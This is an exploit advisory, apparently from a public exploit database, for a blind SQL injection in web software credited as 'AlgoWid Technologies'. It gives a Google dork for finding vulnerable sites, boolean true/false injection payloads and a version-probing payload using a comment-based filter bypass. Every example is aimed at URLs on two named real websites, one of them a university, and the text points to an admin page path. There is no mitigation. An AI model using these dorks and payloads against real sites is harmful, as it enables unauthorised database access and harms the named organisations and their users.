********************************************************* #Exploit Title: AlgoWid Technologies - Blind Sql Injection Vulnerability #Date: 2023-09-11 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by AlgoWid Technologies" #Category:webapps #Tested On: Mac, Firefox [+] search Dork : "Powered by AlgoWid Technologies" [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://protuitions.com/courseApply.php?id=3%27%20and%20true--+ * https://protuitions.com/courseApply.php?id=3' and false--+ * https://protuitions.com/courseApply.php?id=3' and /*!12345substring(@@version,1,1)*/=5--+ ### Demo 2: * https://www.sggswu.edu.in/dept-faculty.php?id=10' and true--+ * https://www.sggswu.edu.in/dept-faculty.php?id=10' and false--+ * https://www.sggswu.edu.in/dept-faculty.php?id=10%27%20and%20/*!12345substring(@@version,1,1)*/=5--+ ### Admin page: localhost/admin ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************